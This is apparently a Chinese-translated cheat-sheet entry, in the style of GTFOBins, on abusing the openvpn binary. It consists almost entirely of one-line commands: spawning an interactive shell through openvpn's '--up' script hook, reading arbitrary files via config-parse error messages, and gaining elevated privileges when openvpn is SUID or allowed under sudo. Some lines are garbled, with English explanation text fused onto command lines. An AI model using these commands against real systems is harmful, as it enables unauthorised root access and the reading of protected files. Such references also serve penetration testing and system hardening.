用来生成一个交互式的系统shell。
openvpn --dev null --script-security 2 --up '/bin/sh -c sh'
从文件中读取数据。
LFILE=要读取的文件路径
openvpn --config "$LFILE"
suid是一种授予文件的权限类型,它允许用户使用者以文件所有者的权限来执行文件。
./openvpn --dev null --script-security 2 --up '/bin/sh -p -c "sh -p"'
The file is actually parsed and the first partial wrong line is returned in an error message. LFILE=要读取的文件路径
./openvpn --config "$LFILE"
如果二进制文件被 sudo 允许以超级用户身份运行,可能被用于访问文件系统、提升或维持特权访问。
sudo openvpn --dev null --script-security 2 --up '/bin/sh -c sh'
The file is actually parsed and the first partial wrong line is returned in an error message. LFILE=要读取的文件路径
sudo openvpn --config "$LFILE"